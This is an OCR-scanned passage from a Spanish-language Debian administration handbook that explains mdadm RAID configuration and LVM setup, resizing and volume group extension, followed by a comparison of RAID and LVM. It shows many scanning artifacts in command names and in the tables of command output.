forma  estandar  de  realizarlo  es  editar  el  archivo  /etc/mdadm/mdadm.  conf,  a  continuacion  un 
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ejemplo  del  mismo: 


Ejemplo  12.1  Archivo  de  configuration  de  mdadm 


#  mdadm . conf 

# 

#  Please  refer  to  mdadm . conf (5)  for  information  about  this  file. 

# 

#  by  default  (built-in),  scan  all  partitions  (/proc/partitions)  and  all 

#  containers  for  MD  superblocks,  alternatively,  specify  devices  to  scan,  using 

#  wildcards  if  desired. 

DEVICE  /dev/sd* 

#  auto-create  devices  with  Debian  standard  permissions 
CREATE  owner=root  group=disk  mode=0660  auto=yes 

#  automatically  tag  new  arrays  as  belonging  to  the  local  system 
HOMEHOST  <system> 

#  instruct  the  monitoring  daemon  where  to  send  mail  alerts 
MAILADDR  root 

#  definitions  of  existing  MD  arrays 

ARRAY  /dev/md0  metadata=1.2  name=mirwiz : 0  UUID=bb085b35 : 28e821bd : 20d697c9 : 650152bb 
ARRAY  /dev/mdl  metadata=1.2  name=mirwiz : 1  UUID=6ec558ca : 0c2c04a0 : 19bca283 : 95f67464 

#  This  configuration  was  auto-generated  on  Thu,  17  Jan  2013  16:21:01  +0100 

#  by  mkconf  3. 2. 5-3 


Uno  de  los  detalles  mas  utiles  es  la  opcion  DEVICE,  que  enumera  los  dispositivos  en  los  que  el 
sistema  buscara  componentes  de  un  volumen  RAID  automaticamente  cuando  inicia.  En  nuestro 
ejemplo,  reemplazamos  el  valor  predeterminado,  partitions  containers,  con  una  lista  explicita 
de  archivos  de  dispositivos,  ya  que  para  algunos  volumenes  elegimos  utilizar  discos  enteros  y 
no  solo  particiones. 

Las  dos  ultimas  lineas  en  nuestro  ejemplo  son  las  que  le  permiten  al  nucleo  seleccionar  de  forma 
segura  que  numero  de  volumen  asignar  a  que  array.  Los  metadatas  almacenados  en  los  mismos 
discos  son  suficientes  para  reconstruir  los  volumenes,  pero  no  para  determinar  el  numero  del 
mismo  (y  el  nombre  del  dispositivo  /dev/md*  correspondiente). 

Afortunadamente,  puede  generar  estas  lineas  automaticamente: 

#  mdadm  --misc  --detail  --brief  /dev/md? 

ARRAY  /dev/md0  metadata=1.2  name=mirwiz : 0  UUID=bb085b35 : 28e821bd : 20d697c9 : 650152bb 
ARRAY  /dev/mdl  metadata=1.2  name=mirwiz : 1  UUID=6ec558ca : 0c2c04a0 : 19bca283 : 95f67464 
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El  contenido  de  estas  dos  ultimas  lineas  no  depende  de  la  lista  de  discos  incluidos  en  el  volumen. 
Por  lo  tanto,  no  es  necesario  regenerar  estas  lrneas  cuando  reemplace  un  disco  fallido  con  uno 
nuevo.  Por  el  otro  lado,  debe  asegurarse  de  actualizar  el  archivo  cuando  cree  o  elimine  un  array 
RAID. 


12.1.2.  LVM 

LVM,  el  gestor  de  volumenes  logicos  («Logical  Volume  Manager  »),  es  otra  forma  de  abstraer  vo¬ 
lumenes  logicos  de  su  soporte  fisico,  que  se  enfoca  en  ofrecer  mayor  flexibilidad  en  lugar  de 
aumentar  confiabilidad.  LVM  permite  modificar  un  volumen  logico  de  forma  transparente  a  las 
aplicaciones;  por  ejemplo,  es  posible  agregar  nuevos  discos,  migrar  sus  datos  y  eliminar  discos 
antiguos  sin  desmontar  el  volumen. 


Conceptos  de  L  VM 

Se  consigue  esta  flexibilidad  con  un  nivel  de  abstraccion  que  incluye  tres  conceptos. 

Primero,  el  PV  {volumen  fisico:  «Physical  Volume»)  es  la  entidad  mas  cercana  al  hardware:  pue- 
den  ser  particiones  en  un  disco,  un  disco  completo  o  inclusive  cualquier  dispositivo  de  bloque 
(tambien  un  array  RAID,  por  ejemplo).  Sepa  que  cuando  configura  un  elemento  fisico  como  PV 
para  LVM,  solo  debe  acceder  al  mismo  a  traves  de  LVM,  de  lo  contrario  confundira  al  sistema. 

Puede  agrupar  una  cantidad  de  PVs  en  un  VG  ( grupo  de  volumenes:  «Volume  Group»),  lo  que  puede 
compararse  con  discos  virtuales  y  extensibles.  Los  VGs  son  abstractos  y  no  apareceran  como  un 
archivo  de  dispositivo  en  la  jerarquia  /dev,  por  lo  que  no  hay  riesgo  de  utilizarlos  directamente. 

El  tercer  tipo  de  objeto  es  el  LV  ( volumen  logico:  «Logical  Volume»),  que  es  una  porcion  de  un 
VG;  si  continuamos  con  la  analogia  de  un  VG-como-disco,  un  LV  se  compara  a  una  particion.  El 
LV  sera  un  dispositivo  de  bloque  que  tendra  un  elemento  en  /dev  y  puede  utilizarlo  como  lo 
haria  con  cualquier  particion  fisica  (usualmente,  almacenar  un  sistema  de  archivos  o  espacio  de 
intercambio). 

Lo  importante  es  que  la  division  de  un  VG  en  varios  LVs  es  completamente  independiente  de  sus 
componentes  fisicos  (los  PVs).  Puede  dividir  un  VG  con  un  solo  componente  fisico  (un  disco  por 
ejemplo)  en  una  docena  de  volumenes  logicos;  similarmente,  un  VG  puede  utilizar  varios  discos 
fisicos  y  aparecer  como  solo  un  volumen  logico  grande.  La  unica  limitacion  es  que,  obviamente, 
el  tamano  total  asignado  a  un  LV  no  puede  ser  mayor  que  la  capacidad  total  de  los  PVs  en  el 
grupo  de  volumenes. 

Generalmente  tiene  sentido,  sin  embargo,  mantener  el  mismo  tipo  de  homogeneidad  entre  los 
componentes  fisicos  de  un  VG  y  dividir  el  VG  en  volumenes  logicos  que  tendran  patrones  de  uso 
similares.  Por  ejemplo,  si  el  hardware  disponible  incluye  discos  rapidos  y  discos  lentos,  podria 
agrupar  los  discos  rapidos  en  un  VG  y  los  lentos  en  otro;  puede  asignar  pedazos  del  primero  a 
aplicaciones  que  necesiten  acceso  rapido  a  los  datos  y  mantener  el  segundo  para  tareas  menos 
exigentes. 
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En  cualquier  caso,  recuerde  que  un  LV  no  esta  asociado  especialmente  a  ningun  PV.  Es  posible 
influenciar  donde  se  almacenaran  fisicamente  los  datos  de  un  LV,  pero  esta  posibilidad  no  es 
necesaria  para  el  uso  diario.  Por  el  contrario,  cuando  evolucionan  los  componentes  fisicos  de  un 
VG,  puede  migrar  las  ubicaciones  fisicas  del  almacenamiento  que  corresponden  a  un  LV  parti- 
cuar  (siempre  manteniendose  dentro  de  los  PVs  asignados  al  VG  por  supuesto). 

Configuracion  de  L  VM 

Sigamos  ahora,  paso  a  paso,  el  proceso  de  configuracion  de  LVM  para  un  caso  de  uso  tipico:  desea- 
mos  simplificar  una  situacion  compleja  de  almacenamiento.  Situaciones  como  esta  generalmen- 
te  ocurren  luego  de  una  historia  larga  y  complicada  de  medidas  temporales  que  se  acumulan.  A 
modo  ilustrativo  utilizaremos  un  servidor  en  el  que  las  necesidades  de  almacenamiento  cambia- 
ron  con  el  tiempo,  lo  que  culmino  en  un  laberinto  de  particiones  disponibles  divididas  en  varios 
discos  parcialmente  utilizados.  En  terminos  mas  concretos,  estan  disponibles  las  siguientes  par¬ 
ticiones: 

■  en  el  disco  sdb,  una  particion  sdb2  de  4Gb; 

■  en  el  disco  sdc,  una  particion  sdc3  de  3  GB; 

■  el  disco  sdd,  de  4  GB,  completamente  disponible; 

■  en  el  disco  sdf,  una  particion  sdf  1  de  4  GB  y  una  particion  sdf  2  de  5GB. 

Ademas,  asumiremos  que  los  discos  sdb  y  sdf  son  mas  rapidos  que  los  otros  dos. 

Nuestro  objetivo  es  configurar  tres  volumenes  logicos  para  tres  aplicaciones  diferentes:  un  ser¬ 
vidor  de  archivos  que  necesita  5  GB  como  espacio  de  almacenamiento,  una  base  de  datos  (l  GB) 
y  un  poco  de  espacio  para  respaldos  (12  GB).  Los  primeros  dos  necesitan  buen  rendimiento,  pe¬ 
ro  los  respaldos  son  menos  criticos  en  cuanto  a  velocidad  de  acceso.  Todas  estas  limitaciones 
evitan  que  simplemente  utilicemos  particiones;  utilizar  LVM  puede  abstraer  el  tamano  fisico  de 
los  dispositivos,  por  lo  que  el  unico  limite  es  el  espacio  total  disponible. 

El  paquete  lvm2  y  sus  dependencias  contienen  las  herramientas  necesarias.  Despues  de  instalar- 
los,  configurar  LVM  son  tres  pasos  que  coinciden  con  los  tres  niveles  de  conceptos. 

Primero,  prepararemos  los  volumenes  fisicos  utilizando  pvc  reate: 

#  pvdisplay 

#  pvcreate  /dev/sdb2 

Physical  volume  ”/dev/sdb2"  successfully  created 

#  pvdisplay 

"/dev/sdb2"  is  a  new  physical  volume  of  "4.00  GiB" 

—  NEW  Physical  volume  — 

PV  Name  /dev/sdb2 

VG  Name 

PV  Size  4.00  GiB 

Allocatable  NO 

PE  Size  0 

Total  PE  0 
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Free  PE  0 

Allocated  PE  0 

PV  UUID  OzuiQQ- j lOe-P593-4tsN-9FGy-TY0d -Quz31I 

#  for  i  in  sdc3  sdd  sdfl  sdf2  ;  do  pvcreate  /dev/$i  ;  done 

Physical  volume  ”/dev/sdc3"  successfully  created 
Physical  volume  "/dev/sdd"  successfully  created 
Physical  volume  "/dev/sdfl"  successfully  created 
Physical  volume  ”/dev/sdf2"  successfully  created 

#  pvdisplay  -C 


PV  VG 

Fmt  Attr  PSize 

PFree 

/dev/sdb2 

lvm2  —  4.00g 

4 . 00g 

/dev/sdc3 

lvm2  —  3.09g 

3 . 09g 

/dev/sdd 

lvm2  —  4.00g 

4 . 00g 

/dev/sdfl 

lvm2  —  4.10g 

4. 10g 

/dev/sdf 2 

lvm2  —  5.22g 

5 . 22g 

Hasta  ahora,  todo  va  bien;  sepa  que  puede  configurar  un  PV  en  un  disco  completo  asf  como  tam- 
bien  en  particiones  individuales  del  mismo.  Como  mostramos,  el  programa  pvdisplay  enumera 
los  PVs  existentes,  con  dos  formatos  de  salida  posibles. 

Ahora  agruparemos  estos  elementos  ffsicos  en  VGs  utilizando  vgcreate.  Reuniremos  PVs  de  los 
discos  rapidos  en  el  VG  vg_critical;  el  otro  VG,  vg_normal  tambien  incluira  los  elementos  mas 
lentos. 


vgdisplay 

No  volume  groups  found 

vgcreate  vg_critical  /dev/sdb2  /dev/sdfl 

Volume  group  "vgcritical"  successfully  created 

vgdisplay 

—  Volume  group  — 


VG  Name 

System  ID 

vg  critical 

Format 

lvm2 

Metadata  Areas 

2 

Metadata  Sequence  No 

1 

VG  Access 

read/write 

VG  Status 

resizable 

MAX  LV 

0 

Cur  LV 

0 

Open  LV 

0 

Max  PV 

0 

Cur  PV 

2 

Act  PV 

2 

VG  Size 

8.09  GiB 

PE  Size 

4.00  MiB 

Total  PE 

2071 

Alloc  PE  /  Size 

0/0 

Free  PE  /  Size 

2071  /  8.09 

VG  UUID 

bpq7z0- PzPD 
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#  vgcreate  vg_normal  /dev/sdc3  /dev/sdd  /dev/sdf2 

Volume  group  "vgnormal"  successfully  created 

#  vgdisplay  -C 

VG  #PV  #L V  #SN  Attr  VSize  VFree 

vgcritical  2  0  0  wz--n-  8.09g  8.09g 
vgnormal  300  wz--n-  12.30g  12.30g 

Aqui  tambien  los  programas  son  bastante  directos  (y  vgdisplay  tambien  propone  dos  forma- 
tos  de  salida).  Sepa  que  es  posible  utilizar  dos  particiones  del  mismo  disco  fi'sico  en  dos  VGs 
diferentes.  Ademas  utilizamos  el  prefijo  vg_  para  el  nombre  de  nuestros  VGs,  pero  es  solo  una 
convencion. 

Ahora  contamos  con  dos  «discos  virtuales»,  de  alrededor  8  GB  y  12  GB  de  tarnano  respectiva- 
mente.  Ahora  los  repartiremos  en  «particiones  virtuales»  (LVs).  Esto  involucra  el  programa 
Ivc  reate  y  una  sintaxis  ligeramente  mas  compleja: 

#  Ivdisplay 

#  Ivc reate  -n  lv_files  -L  5G  vg_critical 

Logical  volume  "Iv  files"  created 

#  Ivdisplay 

—  Logical  volume  — 

LV  Path 
LV  Name 
VG  Name 
LV  UUID 

LV  Write  Access 
LV  Creation  host,  time 
LV  Status 
#  open 
LV  Size 
Current  LE 
Segments 
Allocation 
Read  ahead  sectors 

-  currently  set  to 
Block  device 

#  Ivc reate  -n  lv_base  -L 
Logical  volume  "Iv  base"  created 

#  Ivcreate  -n  lv_backups  -L  12G  vg_normal 
Logical  volume  "Iv  backups"  created 

#  Ivdisplay  -C 

LV  VG  Attr  LSize  Pool  Origin  Data%  Meta%  Move  Log  Cpy%Sync 

**■  Convert 

Ivbase  vgcritical  -wi-a —  1.00g 

Iv  files  vgcritical  -wi-a —  5.00g 

Ivbackups  vgnormal  -wi-a —  12.00g 


/dev/vg_critical/lv_f iles 

lv_f iles 

vgcritical 

J3V0oE-cBYO-KyDe-5e0m-3f70-nv0S- kCWbpT 
read/write 

mirwiz,  2015-06-10  06:10:50  -0400 

available 

0 

5.00  GiB 
1280 
2 

inherit 

auto 

256 

253:0 

1G  vg_critical 
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Necesita  dos  parametros  cuando  cree  volumenes  logicos;  debe  proveerlos  a  Ivc  reate  como  op- 
ciones.  Especificara  el  nombre  del  LV  a  crear  con  la  opcion  -n  y,  usualmente,  su  tamano  con  la 
opcion  -L.  Por  supuesto,  tambien  necesitaremos  indicarle  sobre  que  VG  trabajar,  de  alii  el  ultimo 
parametro  en  la  ejecucion. 


YENDO  MAS  ALLA  El  programa  Ivc  reate  tiene  varias  opciones  que  modifican  la  creacion  del  LV. 

Opciones  de  Ivcreate  Primero  describamos  la  opcion  - 1,  con  la  que  puede  indicar  el  tamano  del  LV  como 
una  cantidad  de  bloques  (en  lugar  de  las  unidades  «humanas»  que  utilizamos  en 
el  ejemplo).  Estos  bloques  (PEs  en  terminos  de  LVM,  extensiones  fisicas:  «physi- 
cal  extents*)  son  unidades  de  espacio  de  almacenamiento  contiguo  en  los  PVs,  y 
no  pueden  dividirse  entre  LVs.  Cuando  uno  desea  definir  el  espacio  de  almacena¬ 
miento  para  un  LV  con  cierta  precision,  por  ejemplo  para  utilizar  todo  el  espacio 
disponible,  generalmente  es  preferible  utilizar  la  opcion  -l  en  lugar  de  -L. 

Tambien  es  posible  sugerir  la  ubicacion  fisica  de  un  LV  para  que  se  almacenen  sus 
extensiones  en  un  PV  particular  (obviamente  limitandose  a  aquellas  asignadas  al 
VC).  Dado  que  sabemos  que  sdb  es  mas  rapido  que  sdf ,  deseariamos  almacenar  Iv 
base  alii  si  nos  interesa  darle  una  ventaja  al  servidor  de  base  de  datos  comparado 
con  el  servidor  de  archivos.  De  esa  forma,  la  orden  a  ejecutar  seria:  Ivcreate  -n 
Ivbase  -L  1G  vgcritical  /dev/sdb2.  Sepa  que  esta  ejecucion  puede  fallar  si 
el  PV  no  posee  suficientes  extensiones  libres.  En  nuestro  ejemplo,  probablemente 
deberiamos  crear  Iv  base  antes  que  Iv  files  para  evitar  estasituacion  —  o  liberar 
algo  de  espacio  en  sdb2  con  el  programa  pvmove. 


Una  vez  que  creo  los  volumenes  logicos,  estos  seran  archivos  de  dispositivos  de  bloque  en  /dev/ 
mapper/: 


#  Is  -l  /dev/mapper 

total  0 


crw . 

1 

root 

root  10,  236 

Jun 

10 

16:52 

cont  rol 

1  rwx  rwx  rwx 

1 

root 

root  7 

Jun 

10 

17:05 

vg 

critical-lv 

base  ->  . 

,/dm-l 

l  rwx  rwx  rwx 

1 

root 

root  7 

Jun 

10 

17:05 

vg 

critical-lv 

files  -> 

. . /dm-0 

l  rwx  rwx  rwx 

1 

root 

root  7 

Jun 

10 

17:05 

vg 

normal-lv  backups  -> 

.  . /dm-2 

#  Is  -l  /dev/dm-* 


brw-  rw — T 

1 

root 

disk 

253, 

0 

Jun 

10 

17:05 

/dev/dm-0 

brw-  rw - 

1 

root 

disk 

253, 

1 

Jun 

10 

17:05 

/dev/dm- 1 

brw-  rw - 

1 

root 

disk 

253, 

2 

Jun 

10 

17:05 

/dev/dm-2 

NOTA  Cuando  inicia  el  equipo,  el  lvm2- activation  systemd  service  unit  ejecuta 
Autodeteccion  de  vgchange  -aay  para  ’’activar”  grupos  de  volumenes:  escanea  los  dispositivos  dis- 
volumenes  LVM  ponibles;  registra  en  el  subsistema  LVM  a  aquellos  que  fueron  inicializados  como 
volumenes  ffsicos  para  LVM,  agrupa  aquellos  que  pertenecen  a  grupos  de  volume¬ 
nes  e  inicializa  y  hace  disponibles  los  volumenes  logicos  relevantes.  Por  lo  tanto,  no 
es  necesario  editar  archivos  de  configuracion  cuando  crea  o  modifica  volumenes 
LVM. 

Sepa,  sin  embargo,  que  se  respalda  la  distribucion  de  los  elementos  de  LVM  (volu¬ 
menes  fisicos  y  logicos  y  grupos  de  volumenes)  en  /etc/lvm/backup,  lo  cual  puede 
ser  util  en  caso  de  algun  problema  (o  tan  solo  para  espiar  tras  bambalinas). 
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Para  hacer  las  cosas  mas  sencillas,  se  crean  enlaces  simbolicos  convenientes  en  directories  que 
coinciden  con  los  VGs: 

#  Is  -l  /dev/vg_critical 

total  0 

Irwxrwxrwx  1  root  root  7  Jun  10  17:05  Ivbase  ->  . ,/dm-l 
Irwxrwxrwx  1  root  root  7  Jun  10  17:05  Ivfiles  ->  ../dm-0 

#  Is  -l  /dev/vg_normal 
total  0 

Irwxrwxrwx  1  root  root  7  Jun  10  17:05  Ivbackups  ->  . ./dm-2 


Puede  utilizar  LVs  exactamente  de  la  misma  forma  que  particiones  estandar: 

#  mkfs.ext4  /dev/vg_normal/lv_backups 
mke2f s  1.42.12  (29-Aug-2014) 

Creating  filesystem  with  3145728  4k  blocks  and  786432  inodes 
Filesystem  UUID:  b5236976-e0e2-462e-81f5-0ae835ddabld 

[■■■] 

Creating  journal  (32768  blocks):  done 

Writing  superblocks  and  filesystem  accounting  information:  done 

#  mkdir  /srv/backups 

#  mount  /dev/vg_normal/lv_backups  /srv/backups 

#  df  -h  /srv/backups 

Filesystem  Size  Used  Avail  Use%  Mounted  on 

/dev/mapper/vgnormal-lv  backups  12G  30M  12G  1%  /srv/backups 

#  [..] 

[...] 

#  cat  /etc/fstab 
[■■■] 

/dev/vg_critical/lv_base  /srv/base  ext4  defaults  0  2 

/dev/vg_critical/lv_files  /srv/files  ext4  defaults  0  2 

/dev/vg_normal/lv  backups  /srv/backups  ext4  defaults  0  2 

Desde  el  punto  de  vista  de  las  aplicaciones,  todas  las  pequenas  particiones  se  encuentran  abs- 

trafdas  en  un  gran  volumen  de  12  GB  con  un  nombre  mas  amigable. 


L  VM  en  el  tiempo 

Aun  cuando  es  conveniente  poder  agrupar  particiones  o  discos  fisicos,  esta  no  es  la  principal  ven- 
taja  que  provee  LVM.  La  flexibilidad  que  brinda  es  especialmente  notable  con  el  paso  del  tiempo 
cuando  evolucionan  las  necesidades.  En  nuestro  ejemplo,  supongamos  que  debemos  almacenar 
nuevos  archivos  grandes  y  que  el  LV  dedicado  al  servidor  de  archivos  es  demasiado  pequeno 
para  contenerlos.  Debido  a  que  no  utilizamos  todo  el  espacio  disponibleen  vg_critical,  pode- 
mos  aumentar  el  tamano  de  lv_files.  Para  ello,  utilizaremos  el  programa  Iv resize  y  luego 
resize2f  s  para  adaptar  el  sistema  de  archivos  segun  corresponda: 
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#  df  -h  /srv/files/ 

Filesystem  Size  Used  Avail  Use%  Mounted  on 

/dev/mapper/vg_critical-lv_files  5.0G  4.6G  146M  97 %  /s rv/files 

#  Ivdisplay  -C  vg_critical/lv_files 

LV  V G  Attr  LSize  Pool  Origin  Data%  Meta%  Move  Log  Cpy%Sync 

Convert 

Iv  files  vgcritical  -wi-ao--  5.00g 

#  vgdisplay  -C  vg_critical 

VG  #P V  #L V  #SN  Attr  VSize  VFree 

vgcritical  220  wz--n-  8.09g  2.09g 

#  Ivresize  -L  7G  vg_critical/lv_files 

Size  of  logical  volume  vgcritical/lv  files  changed  from  5.00  GiB  (1280  extents)  to 
*+■  7.00  GiB  (1792  extents). 

Logical  volume  Ivfiles  successfully  resized 

#  Ivdisplay  -C  vg_critical/lv_files 

LV  VG  Attr  LSize  Pool  Origin  Data%  Meta%  Move  Log  Cpy%Sync 

**  Convert 

Ivfiles  vgcritical  -wi-ao--  7.00g 

#  resize2fs  /dev/vg_critical/lv_files 
resize2fs  1.42.12  (29-Aug-2014) 

Filesystem  at  /dev/vg_critical/lv_files  is  mounted  on  /srv/files;  on-line  resizing 
required 

olddesc  blocks  =  1,  new  descblocks  =  1 

The  filesystem  on  /dev/vg_critical/lv_files  is  now  1835008  (4k)  blocks  long. 

#  df  -h  /srv/files/ 

Filesystem  Size  Used  Avail  Use%  Mounted  on 

/dev/mapper/vg  critical-lv  files  6.9G  4.6G  2.1G  70%  /srv/files 


PRECAUCION 

Redimension  de  sistemas 
de  archivos 


No  todos  los  sistemas  de  archivos  pueden  cambiar  su  tamano  facilmente;  modifi- 
car  un  volumen,  por  lo  tanto,  requerira  primero  desmotar  el  sistema  de  archivos  y 
volver  a  montarlo  luego.  Por  supuesto,  si  uno  desea  disminuir  el  espacio  asignado 
a  un  LV,  primero  debe  reducir  el  sistema  de  archivos;  el  orden  se  invierte  cuando 
el  cambio  de  tamano  es  en  la  otra  direccion:  primero  debe  aumentar  el  volumen 
logico  antes  que  el  sistema  de  archivos  que  contiene.  Es  bastante  directo  ya  que  en 
ningun  momento  el  sistema  de  archivos  puede  ser  mas  grande  que  el  dispositivo 
de  bloques  en  el  que  reside  (tanto  cuando  este  dispositivo  sea  una  particion  fisica 
o  volumen  logico). 


Los  sistemas  de  archivos  ext3,  ext4  y  xfs  pueden  agrandarse  sin  desmontarlos;  de- 
bera  desmontarlos  para  reducirlos.  El  sistema  de  archivos  reiserfs  permite  cambiar 
el  tamano  en  cualquier  direccion  sin  desmontarlo.  El  venerable  ext2  no  lo  permite 
y  siempre  necesitara  desmontarlo  primero. 


Podemos  proceder  de  una  forma  similar  para  extender  el  volumen  que  almacena  la  base  de  datos, 
solo  que  habremos  alcanzado  el  limite  de  espacio  disponible  del  VG: 
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#  df  -h  /srv/base/ 

Filesystem  Size  Used  Avail  Use%  Mounted  on 

/dev/mapper/vg_critical-lv_base  1008M  854M  104M  90%  /srv/base 

#  vgdisplay  -C  vg_critical 

VG  #PV  #LV  #SN  Attr  VSize  VFree 

vgcritical  220  wz--n-  8.09g  92.00m 

Esto  no  importa  ya  que  LVM  permite  agregar  volumenes  fisicos  a  grupos  de  volumenes  exis- 
tentes.  Por  ejemplo,  podrfamos  haber  notado  que  la  particion  sdbl,  que  se  encontraba  fuera  de 
LVM  hasta  ahora,  solo  contenfa  archivos  que  podfan  ser  movidos  a  lv_backups.  Ahora  podre- 
mos  reciclarla  e  integrarla  al  grupo  de  volumenes  y  reclamar  as!  espacio  disponible.  Este  es  el 
proposito  del  programa  vgextend.  Por  supuesto,  debe  prepara  la  particion  como  un  volumen 
fisico  antes.  Una  vez  que  extendio  el  VG,  puede  ejecutar  ordenes  similares  a  las  anteriores  para 
aumentar  el  volumen  logico  y  luego  el  sistema  de  archivos: 

#  pvcreate  /dev/sdbl 

Physical  volume  "/dev/sdbl"  successfully  created 

#  vgextend  vg_critical  /dev/sdbl 

Volume  group  "vgcritical"  successfully  extended 

#  vgdisplay  -C  vg_critical 

VG  #PV  #LV  #SN  Attr  VSize  VFree 

vgcritical  320  wz--n-  9.09g  1.09g 

#  [...] 

[...] 

#  df  -h  /srv/base/ 

Filesystem  Size  Used  Avail  Use%  Mounted  on 

/dev/mapper/vg  critical-lvbase  2.0G  854M  1.1G  45%  /srv/base 


YENDO  MAS  ALLA  LVM  tambien  se  adapta  a  usuarios  mas  avanzados  que  pueden  especificar  a  mano 
LVM  avanzado  muchos  detalles.  Por  ejemplo,  un  administrador  puede  adaptar  el  tamaho  de  los 
bloques  que  componen  a  los  volumenes  logicos  y  fisicos  asi  como  tambien  la  distri- 
bucion  fisica.  Tambien  es  posible  mover  bloques  entre  PVs,  por  ejemplo  para  ajustar 
el  rendimiento  o,  lo  que  es  menos  interesante,  liberar  un  PV  cuando  uno  necesite 
extraer  el  disco  fisico  correspondiente  del  VC  (ya  sea  para  asociarlo  a  otro  VG  o  pa¬ 
ra  eliminarlo  completamente  de  LVM).  Las  paginas  de  manual  que  describen  estos 
programas  generalmente  son  claras  y  detalladas.  Un  buen  punto  de  partida  es  la 
pagina  de  manual  lvm(8). 


12.1.3.  ,:RAID  o  LVM? 

Tanto  RAID  como  LVM  proveen  ventajas  indiscutibles  tan  pronto  como  uno  deja  el  caso  simple 
de  un  equipo  de  escritorio  con  solo  un  disco  duro  en  el  que  los  patrones  de  uso  no  cambian  con 
el  tiempo.  Sin  embargo,  RAID  y  LVM  toman  direcciones  diferentes,  con  objetivos  distintos  y  es 
legitimo  preguntarse  cual  utilizar.  La  respuestas  mas  apropiada,  por  supuesto,  dependera  de  los 
requerimientos  actuales  y  previstos. 
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Hay  unos  pocos  casos  simples  en  los  que  no  surge  esta  pregunta.  Si  los  requisitos  son  prote- 
ger  los  datos  contra  fallos  de  hardware,  obviamente  entonces  configurara  RAID  en  un  array  de 
discos  redundantes  ya  que  LVM  no  soluciona  este  problema  realmente.  Si,  por  el  otro  lado,  ne- 
cesita  un  esquema  de  almacenamiento  flexible  en  el  que  los  volumenes  sean  independientes  de 
la  distribution  fisica  de  los  discos,  RAID  no  es  de  mucha  ayuda  y  LVM  es  la  election  natural. 


NOTA 

Si  el  rendimiento 
importa... 


Si  la  velocidad  de  entrada/salida  es  esencial,  especialmente  en  cuanto  a  tiempos 
de  acceso,  utilizar  LVM  y/o  RAID  es  una  de  las  numerosas  combinaciones  que  ten- 
dran  impacto  en  el  rendimiento  y  esto  influenciara  las  decisiones  sobre  cual  elegir. 
Sin  embargo,  estas  diferencias  de  rendimiento  son  realmente  minimas  y  solo  po- 
dran  ser  medidas  en  unos  pocos  casos  de  uso.  Si  importa  el  rendimiento,  la  mejor 
ganancia  que  puede  obtener  seria  utilizar  medios  de  almacenamiento  no  rotativos 
( discos  de  estado  solido  o  SSDs,  «Solid  State  Drives»);  su  costo  por  megabyte  es 
mas  alto  que  otros  discos  duros  estandar  y  su  capacidad  generalmente  es  menor, 
pero  proveen  un  rendimiento  excelente  para  accesos  aleatorios.  Si  el  patron  de  uso 
incluye  muchas  operaciones  de  entrada/salida  distribuidas  en  todo  el  sistema  de  ar- 
chivos,  por  ejemplos  en  bases  de  datos  donde  se  ejecutan  frecuentemente  consultas 
complejas,  la  ventaja  de  ejecutarlas  en  un  SSD  sobrepasan  grandemente  cualquier 
ganancia  de  elegir  LVM  sobre  RAID  o  su  inversa.  En  estas  situaciones  debe  reali- 
zar  su  seleccion  segun  consideraciones  diferentes  a  solo  la  velocidad  ya  que  puede 
controlar  este  aspecto  mas  facilmente  utilizando  SSDs. 


El  tercer  caso  notable  de  uso  es  uno  en  el  que  uno  solo  desea  agrupar  dos  discos  en  un  solo  volu- 
men,  ya  sea  por  razones  de  rendimiento  o  para  tener  solo  un  sistema  de  archivos  mas  grande  que 
cualquiera  de  los  discos  disponibles.  Puede  solucionar  este  caso  tanto  con  RAID-0  (o  inclusive 
RAID  lineal)  como  con  un  volumen  LVM.  Cuando  se  encuentre  con  esta  situation,  y  sin  limitacio- 
nes  adicionales  (por  ejemplo,  ser  consistente  con  el  resto  de  los  equipos  si  solo  utilizan  RAID), 
generalmente  elegira  utilizar  LVM.  La  configuration  inicial  es  ligeramente  mas  compleja  y  es 
compensada  por  la  flexibilidad  adicional  que  provee  LVM  si  cambian  los  requisitos  o  necesita 
agregar  nuevos  discos. 

Luego  por  supuesto,  esta  el  caso  de  uso  realmente  interesante,  en  el  que  el  sistema  de  almacena¬ 
miento  debe  ser  resistente  a  fallos  de  hardware  y  tambien  flexible  en  cuanto  a  la  asignacion  de 
volumenes.  Ni  RAID  ni  LVM  pueden  solucionar  ambos  requisitos  por  si  mismos;  no  importa,  esta 
es  la  situation  en  la  que  utilizaremos  ambos  al  mismo  tiempo  —  o  mas  bien,  uno  sobre  el  otro. 
El  esquema  mas  utilizado,  casi  un  estandar  desde  que  RAID  y  LVM  son  suficientemente  madu- 
ros,  es  asegurar  redundancia  en  los  datos  primero  agrupando  discos  en  una  cantidad  menor  de 
arrays  RAID  grandes  y  luego  utilizar  estos  arrays  RAID  como  volumenes  fisicos  LVM;  conseguira 
las  particiones  logicas  para  los  sistemas  de  archivo  a  partir  de  estos  LVs.  El  punto  fuerte  de  esta 
configuration  es  que,  cuando  falla  un  disco,  solo  necesitara  reconstruir  una  pequena  cantidad 
de  arrays  RAID,  de  esa  forma  limitando  el  tiempo  que  utiliza  el  administrador  en  recuperarlo. 

Veamos  un  caso  concreto:  el  departamento  de  relaciones  publicas  en  Lalcot  Corp  necesita  una 
estacion  de  trabajo  para  edition  de  video,  pero  el  presupuesto  del  mismo  no  permite  invertir  en 
hardware  de  gama  alta  desde  el  principio.  Se  decide  entonces  utilizar  el  presupuesto  en  hardwa¬ 
re  especifico  a  la  naturaleza  grafica  del  trabajo  (pantalla  y  tarjeta  de  video)  y  utilizar  hardware 
generico  para  el  almacenamiento.  Sin  embargo,  como  es  publicamente  conocido,  el  video  digital 
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tiene  ciertas  necesidades  particulares  para  su  almacenamiento:  una  gran  cantidad  de  datos  que 
guardar  y  es  importante  la  tasa  de  rendimiento  para  leer  y  escribir  estos  datos  es  importante 
para  el  rendimiento  general  del  sistema  (mas  que  el  tiempo  tipico  de  acceso,  por  ejemplo).  Nece- 
sita  cumplir  estos  requisites  con  hardware  generico,  en  este  caso  dos  discos  duros  SATA  de  300 
Gb;  tambien  debe  hacer  que  los  datos  de  sistema,  y  algunos  datos  de  usuarios,  puedan  resistir 
fallos  en  el  hardware.  Los  videos  editados  deben  estar  seguros,  pero  los  videos  que  todavia  no 
fueron  editados  son  menos  criticos  ya  que  todavia  se  encuentran  en  cinta. 

Satisfacemos  estas  limitaciones  combinando  RAID-1  y  LVM.  Conectamos  los  discos  a  dos  con- 
troladoras  SATA  diferentes  para  optimizar  el  acceso  en  paralelo  y  reducir  el  riesgo  de  fallos 
simultaneos,  por  lo  que  apareceran  como  sda  y  sdc.  Los  particionamos  de  forma  identica  segun 
el  siguiente  esquema: 

#  fdisk  -l  /dev/sda 

